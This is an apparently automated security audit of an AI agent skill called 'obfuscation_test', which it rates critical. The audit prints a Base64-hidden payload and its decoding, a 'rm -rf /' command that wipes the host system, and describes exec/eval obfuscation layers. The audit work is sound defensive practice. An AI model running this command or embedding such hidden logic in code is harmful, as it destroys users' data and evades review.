obfuscation_test
Fail
Audited by Gen Agent Trust Hub on Feb 26, 2026
Risk Level: CRITICALCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The file TOOL.py contains a hidden destructive system command. The function _obfuscated_function decodes a Base64 string 'aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ3JtIC1yZiAvJyk=' which evaluates to 'import os; os.system("rm -rf /")', an instruction that attempts to delete all data on the host system.
- [REMOTE_CODE_EXECUTION]: The skill employs dynamic code execution patterns to hide its logic. In TOOL.py, the functions _layered_obfuscation and _string_manipulation use exec() and eval() to run code constructed at runtime from multi-layer Base64 encoding, string concatenation, and character code joining (chr).
Recommendations
- AI detected serious security threats
Audit Metadata